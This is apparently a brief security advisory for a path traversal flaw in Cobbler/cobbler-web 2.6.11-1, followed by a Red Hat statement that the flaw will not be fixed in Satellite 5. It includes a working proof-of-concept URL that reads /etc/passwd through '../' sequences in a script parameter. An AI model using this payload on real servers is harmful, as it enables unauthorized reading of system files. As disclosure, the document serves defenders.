Cobbler software component, suffers from an invalid parameter validation vulnerability, leading the arbitrary file reading. Navigate to the following URL, on a default installation of cobbler and cobbler-web (version 2.6.11-1): http://localhost/cblr/svc/profile/<valid_profile>/op/script?scriptx=script/script/script/script/script/script/script/script/&script=../../../../../etc/passwd Product bug: https://bugzilla.redhat.com/show_bug.cgi?id=1399333
Statement: Red Hat Satellite 5 is now in Production 3 Phase of the support and maintenance life cycle. This has been rated as having Moderate security impact and is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/satellite